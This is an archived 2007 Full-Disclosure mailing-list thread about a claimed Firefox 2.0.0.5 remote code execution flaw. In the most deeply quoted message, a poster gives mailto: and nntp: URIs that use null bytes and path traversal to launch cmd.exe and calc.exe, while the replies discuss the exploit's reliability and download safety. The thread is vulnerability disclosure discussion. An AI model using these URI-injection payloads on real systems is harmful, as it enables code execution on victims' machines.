[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <997ef2c20707251031m32d79bacs3635874d1562acde@mail.gmail.com>
Date: Wed, 25 Jul 2007 13:31:09 -0400
From: "Nate McFeters" <nate.mcfeters@...il.com>
To: wac <waldoalvarez00@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: FIREFOX 2.0.0.5 new vulnerability
Hey Waldo,
As always with exploits, it's difficult to predict how they will
interact in every environment they may be accessed in. If you have
launch external URI's on by default, the tab issue will come up;
however, the exploit should still occur. I'd recommend turning off
the launch external URI's feature for your own safety though.
Additionally, not sure why you want a hashed version of this flaw...
it's not like we are passing you an executable... if you are concerned
that it will be modified in transit, you could always visit
httpS://xs-sniper.com. I'd think SSL would provide more than
reasonable security around that concern.
If you need more, you could send me your private PGP key and I could
send the exploit to you directly. :)
Thanks,
Nate
On 7/25/07, wac <waldoalvarez00@...il.com> wrote:
> Well I hope the next version won't open 45 internet explorers when I click
> the mailto URLs. And that when you download something you don't have the
> save button enabled by default (and with that delay to avoid return hits
> security things) It should have enabled by default the cancel button.
> Instead of everybody having to wait a century to get the save button
> activated. Is so broken that way. Ahh and to prevent clicks the dialog
> displayed somewhere away from the mouse pointer. Ahh and by default no
> having enabled the open with when you download but the save as (somebody can
> hit enter without noticing). Hey maybe configurable?
>
> And what about providing in the website some hash over SSL so you can verify
> that is was not modified on the fly when you download? I mean encrypting
> every download around is simply brain dead but a hash is OK. Hey what about
> a digital signature you could verify with a public key? Zero overload on
> servers ;)
>
> Regards
> Waldo Alvarez.
>
> On 7/25/07, Mesut EREN <meren@...akkiremit.com.tr> wrote:
> >
> >
> >
> >
> > Hi all,
> >
> > FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5 .
> But don't work is code.
> >
> > Example code is
> >
> > mailto:%00%00../../../../../../windows/system32/cmd".exe
> ../../../../../../../../windows/system32/calc.exe " - "
> blah.bat
> >
> > nntp:%00%00../../../../../../windows/system32/cmd".exe
> ../../../../../../../../windows/system32/calc.exe " - "
> blah.bat
> >
> > Where i missing?
> >
> >
> >
> > Mesut EREN
> > BAŞAK ÇATI & CEPHE SİSTEMLERİ
> > Bilgi İşlem Sorumlusu
> >
> > MCSA:S,MCSE:S,CEH,CCNA
> >
> > meren@...akkiremit.com.tr
> >
> >
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists